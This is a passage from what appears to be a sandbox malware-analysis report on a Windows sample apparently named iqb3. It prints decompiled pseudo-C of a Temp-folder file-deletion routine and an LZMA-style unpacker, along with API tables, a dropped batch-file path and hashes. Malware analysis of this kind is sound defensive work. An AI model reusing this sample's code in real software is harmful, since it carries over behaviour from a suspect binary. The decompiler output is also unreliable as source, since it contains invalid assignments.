								return E00404FC9(0xffffffe5, _t72);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L33;
							}
							E00404FC9(0xfffffff1, _t72);
							return E00405B92(_t72, 0);
						}
						L33:
						 *0x423768 =  *0x423768 + 1;
						return _t40;
					}
					__eflags = _t69 & 0x00000002;
					if((_t69 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}


















                                                                      0x004055a8
                                                                      0x004055ad
                                                                      0x004055b6
                                                                      0x004055b9
                                                                      0x004055c1
                                                                      0x004055c4
                                                                      0x004055c7
                                                                      0x004055cf
                                                                      0x004055d1
                                                                      0x004055d2
                                                                      0x00000000
                                                                      0x004055d2
                                                                      0x004055dd
                                                                      0x004055e0
                                                                      0x004055e0
                                                                      0x004055e0
                                                                      0x004055e4
                                                                      0x004055f7
                                                                      0x004055fe
                                                                      0x00405603
                                                                      0x00405607
                                                                      0x00405617
                                                                      0x00405609
                                                                      0x0040560f
                                                                      0x0040560f
                                                                      0x0040561c
                                                                      0x0040561f
                                                                      0x0040562a
                                                                      0x00405630
                                                                      0x00405635
                                                                      0x00405645
                                                                      0x00405647
                                                                      0x0040564d
                                                                      0x00405650
                                                                      0x00405653
                                                                      0x0040570b
                                                                      0x0040570b
                                                                      0x0040570f
                                                                      0x00405711
                                                                      0x00405711
                                                                      0x00405711
                                                                      0x00405711
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405659
                                                                      0x00405659
                                                                      0x00405662
                                                                      0x00405668
                                                                      0x0040566d
                                                                      0x00405670
                                                                      0x00405672
                                                                      0x00405676
                                                                      0x00405678
                                                                      0x00405678
                                                                      0x00405676
                                                                      0x0040567b
                                                                      0x0040567e
                                                                      0x00405691
                                                                      0x00405693
                                                                      0x00405698
                                                                      0x0040569f
                                                                      0x004056ba
                                                                      0x004056bf
                                                                      0x004056c1
                                                                      0x004056e5
                                                                      0x004056c3
                                                                      0x004056c3
                                                                      0x004056c6
                                                                      0x004056da
                                                                      0x004056c8
                                                                      0x004056cb
                                                                      0x004056d3
                                                                      0x004056d3
                                                                      0x004056c6
                                                                      0x004056a1
                                                                      0x004056a7
                                                                      0x004056a9
                                                                      0x004056af
                                                                      0x004056af
                                                                      0x004056a9
                                                                      0x00000000
                                                                      0x0040569f
                                                                      0x00405680
                                                                      0x00405683
                                                                      0x00405685
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405687
                                                                      0x00405689
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040568b
                                                                      0x0040568f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004056ea
                                                                      0x004056f4
                                                                      0x004056fa
                                                                      0x004056fa
                                                                      0x00405705
                                                                      0x00000000
                                                                      0x00405705
                                                                      0x00405621
                                                                      0x00405628
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004055e6
                                                                      0x004055e6
                                                                      0x004055e8
                                                                      0x00405715
                                                                      0x00405717
                                                                      0x0040571a
                                                                      0x0040576b
                                                                      0x0040576b
                                                                      0x0040576b
                                                                      0x0040571c
                                                                      0x0040571f
                                                                      0x0040572a
                                                                      0x0040572f
                                                                      0x00405731
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405734
                                                                      0x00405740
                                                                      0x00405745
                                                                      0x00405747
                                                                      0x00000000
                                                                      0x00405762
                                                                      0x00405749
                                                                      0x0040574c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405751
                                                                      0x00000000
                                                                      0x00405758
                                                                      0x00405721
                                                                      0x00405721
                                                                      0x00000000
                                                                      0x00405721
                                                                      0x004055ee
                                                                      0x004055f1
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004055f1

                                                                      APIs
                                                                      • DeleteFileA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,746AF560,00000000), ref: 004055C7
                                                                      • lstrcatA.KERNEL32(00420CE8,\*.*,00420CE8,?,?,C:\Users\user\AppData\Local\Temp\,746AF560,00000000), ref: 0040560F
                                                                      • lstrcatA.KERNEL32(?,00409014,?,00420CE8,?,?,C:\Users\user\AppData\Local\Temp\,746AF560,00000000), ref: 00405630
                                                                      • lstrlenA.KERNEL32(?,?,00409014,?,00420CE8,?,?,C:\Users\user\AppData\Local\Temp\,746AF560,00000000), ref: 00405636
                                                                      • FindFirstFileA.KERNEL32(00420CE8,?,?,?,00409014,?,00420CE8,?,?,C:\Users\user\AppData\Local\Temp\,746AF560,00000000), ref: 00405647
                                                                      • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004056F4
                                                                      • FindClose.KERNEL32(00000000), ref: 00405705
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                      • String ID: "C:\Users\Public\iqb3.bat" $C:\Users\user\AppData\Local\Temp\$\*.*
                                                                      • API String ID: 2035342205-3159485570
                                                                      • Opcode ID: b62b88e40ae1a5b6069845eed9185053ab501b777c23ff11b8ddb97d98035749
                                                                      • Instruction ID: f8ba85616855857cc059e9ef13111783737efc0c899630c1c9014c5665c50712
                                                                      • Opcode Fuzzy Hash: b62b88e40ae1a5b6069845eed9185053ab501b777c23ff11b8ddb97d98035749
                                                                      • Instruction Fuzzy Hash: 34510070804A04BADB21BB658D45FBF7A78DB42314F54413BF445721D2D73C8982EE6D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004062B8 Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 98%
                                                                      			E004062B8() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M00406B5B))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
